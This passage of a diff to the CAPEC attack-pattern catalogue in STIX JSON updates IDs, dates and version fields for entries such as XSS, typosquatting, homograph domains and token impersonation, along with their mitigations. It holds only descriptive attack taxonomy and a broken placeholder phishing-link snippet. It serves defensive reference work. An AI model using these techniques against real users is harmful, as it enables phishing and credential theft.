yacht." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--75ad7a01-378f-4c1a-a2c2-d6ec7b631893" + "id": "attack-pattern--4341bdb9-941f-4ed5-8ac9-d7df67eae4d9" }, { "name": "Unauthorized Use of Device Resources", "description": "An adversary that has previously obtained unauthorized access to certain device resources, uses that access to obtain information such as location and network information.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -37981,17 +38653,18 @@ "x_capec_skills_required": { "High": "Knowledge of the affected system, including what devices are connected to it, as well as knowledge of how to extract information from these devices." }, - "x_capec_abstraction": "Detailed", + "x_capec_abstraction": "Standard", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--ed7a69f4-8970-4c1e-9b8b-f17ac93169ed" + "id": "attack-pattern--f7ebb8a9-bfde-4217-979b-2a4fa9ed43ed" }, { "name": "Cross-Site Scripting (XSS)", "description": "An adversary embeds malicious scripts in content that will be served to web browsers. The goal of the attack is for the target software, the client-side browser, to execute the script with the users' privilege level. An attack of this type exploits a programs' vulnerabilities that are brought on by allowing remote hosts to execute code and scripts. Web browsers, for example, have some simple security controls in place, but if a remote attacker is allowed to execute scripts (through injecting them in to user-generated content like bulletin boards) then these controls may be bypassed. Further, these attacks are very difficult for an end user to detect.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", @@ -38047,119 +38720,120 @@ "\n Classic phishing attacks lure users to click on content that appears trustworthy, such as logos, and links that seem to go to their trusted financial institutions and online auction sites. But instead the attacker appends malicious scripts into the otherwise innocent appearing resources. The HTML source for a standard phishing attack looks like this:\n maliciousscript\">Trusted Site\n When the user clicks the link, the appended script also executes on the local user's machine.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--55db7027-b6ec-40e3-addf-e281f2eab9ce" + "id": "attack-pattern--67562799-2d10-4e76-b3da-649c6d844340" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--e3b86e7e-0695-468a-bae2-15d1139f9001", - "source_ref": "course-of-action--d8c851f4-9464-4d22-b6a5-8e817e3754d1", + "id": "relationship--ae108410-45fa-495c-8900-bdbbfb9b1fc6", + "source_ref": "course-of-action--301e5bbb-d0b4-4c64-93b0-d83f7a317420", "relationship_type": "mitigates", - "target_ref": "attack-pattern--55db7027-b6ec-40e3-addf-e281f2eab9ce" + "target_ref": "attack-pattern--67562799-2d10-4e76-b3da-649c6d844340" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--2bf7129f-455d-425a-8bc3-eb57a0ccd111", - "source_ref": "course-of-action--a837738e-a076-4304-b906-9664bc087b5e", + "id": "relationship--d9a8c5e3-2477-43de-8f04-8f41783b7b35", + "source_ref": "course-of-action--f574f5d2-f432-454c-b6f1-15e34c1c479d", "relationship_type": "mitigates", - "target_ref": "attack-pattern--55db7027-b6ec-40e3-addf-e281f2eab9ce" + "target_ref": "attack-pattern--67562799-2d10-4e76-b3da-649c6d844340" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a23ec7a9-112f-41da-b705-d1c4b601e5b6", - "source_ref": "course-of-action--12459e09-4b33-44c1-9449-b1d67b30214f", + "id": "relationship--83bb94b7-c7bf-407b-ad77-5411a93c2090", + "source_ref": "course-of-action--a9cece7b-a84a-4af1-8e06-3f188167a17c", "relationship_type": "mitigates", - "target_ref": "attack-pattern--55db7027-b6ec-40e3-addf-e281f2eab9ce" + "target_ref": "attack-pattern--67562799-2d10-4e76-b3da-649c6d844340" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--456c0c5d-92ab-4bce-af7b-93fbfeb1a496", - "source_ref": "course-of-action--f3bd3d55-f25e-4bff-b92b-5a1b421a1975", + "id": "relationship--6d49e451-7651-4e70-8e46-a376b1f45c4a", + "source_ref": "course-of-action--5ab5bb92-9b0c-4d06-a27f-392c82b316c5", "relationship_type": "mitigates", - "target_ref": "attack-pattern--55db7027-b6ec-40e3-addf-e281f2eab9ce" + "target_ref": "attack-pattern--67562799-2d10-4e76-b3da-649c6d844340" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--7000c7a7-1bad-4283-af83-a349c662c53f", - "source_ref": "course-of-action--973c207c-2784-4f0c-98e8-0ac062857549", + "id": "relationship--124a6bc7-eaef-45e2-bb9e-0359803ef430", + "source_ref": "course-of-action--a96d9ccc-8454-4b63-853f-1cfd142e970c", "relationship_type": "mitigates", - "target_ref": "attack-pattern--55db7027-b6ec-40e3-addf-e281f2eab9ce" + "target_ref": "attack-pattern--67562799-2d10-4e76-b3da-649c6d844340" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--ee09e929-2b20-4909-bb02-07c107413e98", - "source_ref": "course-of-action--c4397106-6835-4ce6-b6e4-80a636d6f5a8", + "id": "relationship--cc6e015d-75ba-4437-992c-d391fd8fe429", + "source_ref": "course-of-action--116eb05d-d01e-415d-b3d1-7d05b9b2d526", "relationship_type": "mitigates", - "target_ref": "attack-pattern--55db7027-b6ec-40e3-addf-e281f2eab9ce" + "target_ref": "attack-pattern--67562799-2d10-4e76-b3da-649c6d844340" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--55e38fb1-29ee-4254-a04d-3fc6275971b5", - "source_ref": "course-of-action--0b964038-37af-42a2-a349-07fe08c6d613", + "id": "relationship--ac4c7cbb-8bb1-4d48-bb09-24bd2867ec1c", + "source_ref": "course-of-action--9e10d99c-ac01-427e-aee4-2df1aa87286a", "relationship_type": "mitigates", - "target_ref": "attack-pattern--55db7027-b6ec-40e3-addf-e281f2eab9ce" + "target_ref": "attack-pattern--67562799-2d10-4e76-b3da-649c6d844340" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--f92119ed-5fbe-4d50-ad09-6c8a4d22422a", - "source_ref": "course-of-action--29cc8977-ef47-4c16-a4d2-92483b2e34ec", + "id": "relationship--a7601573-6a34-404f-a4fa-bd61bafa7224", + "source_ref": "course-of-action--fe2064cc-6c8a-4d9b-87e8-5f0491194111", "relationship_type": "mitigates", - "target_ref": "attack-pattern--55db7027-b6ec-40e3-addf-e281f2eab9ce" + "target_ref": "attack-pattern--67562799-2d10-4e76-b3da-649c6d844340" }, { "name": "TypoSquatting", "description": "An adversary registers a domain name with at least one character different than a trusted domain. A TypoSquatting attack takes advantage of instances where a user mistypes a URL (e.g. www.goggle.com) or not does visually verify a URL before clicking on it (e.g. phishing attack). As a result, the user is directed to an adversary-controlled destination. TypoSquatting does not require an attack against the trusted domain or complicated reverse engineering.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -38194,53 +38868,54 @@ "\n An adversary sends an email, impersonating paypal.com, to a user stating that they have just received a money transfer and to click the given link to obtain their money.\n However, the link the in email is paypa1.com instead of paypal.com, which the user clicks without fully reading the link.\n The user is directed to the adversary's website, which appears as if it is the legitimate paypal.com login page.\n The user thinks they are logging into their account, but have actually just given their paypal credentials to the adversary. The adversary can now use the user's legitimate paypal credentials to log into the user's account and steal any money which may be in the account.\n TypoSquatting vulnerability allows an adversary to impersonate a trusted domain and trick a user into visiting the malicious website to steal user credentials.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--5f14537b-77d4-4179-b449-6f26a1ff2003" + "id": "attack-pattern--c3ea9757-0ac9-42b7-96df-a6dfe6f85838" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--3043c368-4151-4520-8e80-67d1a88a38e7", - "source_ref": "course-of-action--460bc4f1-e5e3-4d50-a18e-21581d793898", + "id": "relationship--3ed4317e-bd08-4da8-819d-409b4a553b41", + "source_ref": "course-of-action--d5c9990e-fec4-4e5e-a4bd-07a832e34a43", "relationship_type": "mitigates", - "target_ref": "attack-pattern--5f14537b-77d4-4179-b449-6f26a1ff2003" + "target_ref": "attack-pattern--c3ea9757-0ac9-42b7-96df-a6dfe6f85838" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-630-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Purchase potential TypoSquatted domains and forward to legitimate domain.", "type": "course-of-action", - "id": "course-of-action--155365df-cc03-453a-b05a-516c7c61f509" + "id": "course-of-action--76adf409-ce96-41bf-8ec8-bf4527b29b32" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--be8b99c1-8f80-4d1c-9fba-b9b980a49f3f", - "source_ref": "course-of-action--155365df-cc03-453a-b05a-516c7c61f509", + "id": "relationship--7b385832-942e-4c6c-872f-557dc3452a35", + "source_ref": "course-of-action--76adf409-ce96-41bf-8ec8-bf4527b29b32", "relationship_type": "mitigates", - "target_ref": "attack-pattern--5f14537b-77d4-4179-b449-6f26a1ff2003" + "target_ref": "attack-pattern--c3ea9757-0ac9-42b7-96df-a6dfe6f85838" }, { "name": "SoundSquatting", "description": "An adversary registers a domain name that sounds the same as a trusted domain, but has a different spelling. A SoundSquatting attack takes advantage of a user's confusion of the two words to direct Internet traffic to adversary-controlled destinations. SoundSquatting does not require an attack against the trusted domain or complicated reverse engineering.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -38278,53 +38953,54 @@ "\n An adversary sends an email, impersonating the popular banking website guaranteebanking.com, to a user stating that they have just received a new deposit and to click the given link to confirm the deposit.\n However, the link the in email is guarantybanking.com instead of guaranteebanking.com, which the user clicks without fully reading the link.\n The user is directed to the adversary's website, which appears as if it is the legitimate guaranteebanking.com login page.\n The user thinks they are logging into their account, but have actually just given their guaranteebanking.com credentials to the adversary. The adversary can now use the user's legitimate guaranteebanking.com credentials to log into the user's account and steal any money which may be in the account.See also: SoundSquatting vulnerability allows an adversary to impersonate a trusted domain and leverages a user's confusion between the meaning of two words which are pronounced the same into visiting the malicious website to steal user credentials." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--11acc243-fb87-454b-862e-8b3bb4dabaa7" + "id": "attack-pattern--ce52b42b-d355-43fb-92f9-ce114cd3cfdf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--c3097a4e-afb2-43f4-8254-458f0a690674", - "source_ref": "course-of-action--460bc4f1-e5e3-4d50-a18e-21581d793898", + "id": "relationship--4784e3b1-b9fe-44f7-8155-d30786b6e010", + "source_ref": "course-of-action--d5c9990e-fec4-4e5e-a4bd-07a832e34a43", "relationship_type": "mitigates", - "target_ref": "attack-pattern--11acc243-fb87-454b-862e-8b3bb4dabaa7" + "target_ref": "attack-pattern--ce52b42b-d355-43fb-92f9-ce114cd3cfdf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-631-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Purchase potential SoundSquatted domains and forward to legitimate domain.", "type": "course-of-action", - "id": "course-of-action--0ec0dfef-f447-46a9-8c8e-66fd322a6324" + "id": "course-of-action--2c6dd98d-3862-41ea-a343-97517e8c78fb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--ba678c9e-ba03-4a97-ab2e-5a305009c8e2", - "source_ref": "course-of-action--0ec0dfef-f447-46a9-8c8e-66fd322a6324", + "id": "relationship--32daa3f9-f58d-4e4d-8d3b-7e513b3889e0", + "source_ref": "course-of-action--2c6dd98d-3862-41ea-a343-97517e8c78fb", "relationship_type": "mitigates", - "target_ref": "attack-pattern--11acc243-fb87-454b-862e-8b3bb4dabaa7" + "target_ref": "attack-pattern--ce52b42b-d355-43fb-92f9-ce114cd3cfdf" }, { "name": "Homograph Attack via Homoglyphs", "description": "An adversary registers a domain name containing a homoglyph, leading the registered domain to appear the same as a trusted domain. A homograph attack leverages the fact that different characters among various character sets look the same to the user. Homograph attacks must generally be combined with other attacks, such as phishing attacks, in order to direct Internet traffic to the adversary-controlled destinations.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -38356,53 +39032,54 @@ "\n An adversary sends an email, impersonating bankofamerica.com to a user stating that they have just received a new deposit and to click the given link to confirm the deposit.\n However, the link the in email is bankofamerica.com, where the 'a' and 'e' characters are Cyrillic and not ASCII, instead of bankofamerica.com (all ASCII), which the user clicks after carefully reading the URL, making sure that typosquatting and soundsquatting attacks are not being leveraged against them.\n The user is directed to the adversary's website, which appears as if it is the legitimate bankofamerica.com login page.\n The user thinks they are logging into their account, but have actually just given their bankofamerica.com credentials to the adversary. The adversary can now use the user's legitimate bankofamerica.com credentials to log into the user's account and steal any money which may be in the account.\n Homograph vulnerability allows an adversary to impersonate a trusted domain by leveraging homoglyphs and tricking a user into visiting the malicious website to steal user credentials.See also: CVE-2012-0584 CVE-2009-0652 CVE-2005-0233 CVE-2005-0234 CVE-2005-0235 CVE-2005-0236 CVE-2005-0237 CVE-2005-0238" ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--dd786695-6dba-4ac0-98c1-5a3fbc7be810" + "id": "attack-pattern--6326cb50-e1ee-4029-aab8-0af7efd3a268" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--3e651007-3d4f-45c8-b28d-41ea873bd928", - "source_ref": "course-of-action--460bc4f1-e5e3-4d50-a18e-21581d793898", + "id": "relationship--dec10c5f-f312-48a3-8d6a-48d5939b0f00", + "source_ref": "course-of-action--d5c9990e-fec4-4e5e-a4bd-07a832e34a43", "relationship_type": "mitigates", - "target_ref": "attack-pattern--dd786695-6dba-4ac0-98c1-5a3fbc7be810" + "target_ref": "attack-pattern--6326cb50-e1ee-4029-aab8-0af7efd3a268" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-632-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Utilize browsers that can warn users if URLs contain characters from different character sets.", "type": "course-of-action", - "id": "course-of-action--b0e8d6d6-8c87-4bfd-baa1-a7532c144b27" + "id": "course-of-action--bb0f214e-a1d7-448a-ab0c-e775bcd36879" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--0e745c69-e8f5-4903-b30b-499e6234173c", - "source_ref": "course-of-action--b0e8d6d6-8c87-4bfd-baa1-a7532c144b27", + "id": "relationship--815e4cb8-f89c-47bf-b28a-1af4e3f43a48", + "source_ref": "course-of-action--bb0f214e-a1d7-448a-ab0c-e775bcd36879", "relationship_type": "mitigates", - "target_ref": "attack-pattern--dd786695-6dba-4ac0-98c1-5a3fbc7be810" + "target_ref": "attack-pattern--6326cb50-e1ee-4029-aab8-0af7efd3a268" }, { "name": "Token Impersonation", "description": "An adversary exploits a weakness in authentication to create an access token (or equivalent) that impersonates a different entity, and then associates a process/thread to that that impersonated token. This action causes a downstream user to make a decision or take action that is based on the assumed identity, and not the response that blocks the adversary.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2018-04-12T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -38431,15 +39108,16 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--a6fe6cd6-b06a-485a-97d1-781431589348" + "id": "attack-pattern--b4167cd3-5fad-4e84-ab0d-e24543675a1b" }, { "name": "Probe Audio and Video Peripherals", "description": "The adversary exploits the target system's audio and video functionalities through malware or scheduled tasks. The goal is to capture sensitive information about the target for financial, personal, political, or other gains which is accomplished by collecting communication data between two parties via the use of peripheral devices (e.g. microphones and webcams) or applications with audio and video capabilities (e.g. Skype) on a system.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2018-07-31T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -38473,65 +39151,66 @@ "An adversary can capture audio and video, and transmit the recordings to a C2 server or a similar capability." ], "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--c4750f13-e2dd-43ca-b73c-7993ca5de573" + "id": "attack-pattern--6b71d1a3-f57c-4c58-83c7-a7c44c55ab2d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-634-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Prevent unknown code from executing on a system through whitelisting policy.", "type": "course-of-action", - "id": "course-of-action--9179430b-8fb0-4697-a882-f6dcd6d9978f" + "id": "course-of-action--5a3e396c-2570-4ed5-9da8-0583ffc0cb73" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a58c4169-0f5c-44f5-a4c8-16305de45456", - "source_ref": "course-of-action--9179430b-8fb0-4697-a882-f6dcd6d9978f", + "id": "relationship--e9aa7abb-e935-4be6-8e9f-cd6c1f042120", + "source_ref": "course-of-action--5a3e396c-2570-4ed5-9da8-0583ffc0cb73", "relationship_type": "mitigates", - "target_ref": "attack-pattern--c4750f13-e2dd-43ca-b73c-7993ca5de573" + "target_ref": "attack-pattern--6b71d1a3-f57c-4c58-83c7-a7c44c55ab2d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-634-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Patch installed applications as soon as new updates become available.", "type": "course-of-action", - "id": "course-of-action--d7b68a77-124d-4ddd-8e29-e185387ec071" + "id": "course-of-action--5eb18362-1cac-41e2-ad66-e4887a473ab0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b39351fc-fc48-4c57-96ff-cb2429eacb1c", - "source_ref": "course-of-action--d7b68a77-124d-4ddd-8e29-e185387ec071", + "id": "relationship--bf2dd714-1db9-4c9b-b2e7-4ef7380a4319", + "source_ref": "course-of-action--5eb18362-1cac-41e2-ad66-e4887a473ab0", "relationship_type": "mitigates", - "target_ref": "attack-pattern--c4750f13-e2dd-43ca-b73c-7993ca5de573" + "target_ref": "attack-pattern--6b71d1a3-f57c-4c58-83c7-a7c44c55ab2d" }, { "name": "Alternative Execution Due to Deceptive Filenames", "description": "The extension of a file name is often used in various contexts to determine the application that is used to open and use it. If an attacker can cause an alternative application to be used, it may be able to execute malicious code, cause a denial of service or expose sensitive information.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2018-05-31T00:00:00.000Z", "modified": "2018-05-31T00:00:00.000Z", @@ -38553,40 +39232,41 @@ ], "x_capec_abstraction": "Standard", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--25953ab2-8df4-4741-9268-2f7faf65f740" + "id": "attack-pattern--11b6d192-7c0b-4f9a-a35d-478076c9ae58" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-05-31T00:00:00.000Z", "modified": "2018-05-31T00:00:00.000Z", "name": "coa-635-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Applications should insure that the content of the file is consistent with format it is expecting, and not depend solely on the file extension.", "type": "course-of-action", - "id": "course-of-action--b165dedc-588b-4199-9058-45bd310f3e50" + "id": "course-of-action--cc8cf389-f1d4-45b4-95a4-3b5659f8b063" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-05-31T00:00:00.000Z", "modified": "2018-05-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--3ff55576-2f15-428f-a11c-adca9b90b541", - "source_ref": "course-of-action--b165dedc-588b-4199-9058-45bd310f3e50", + "id": 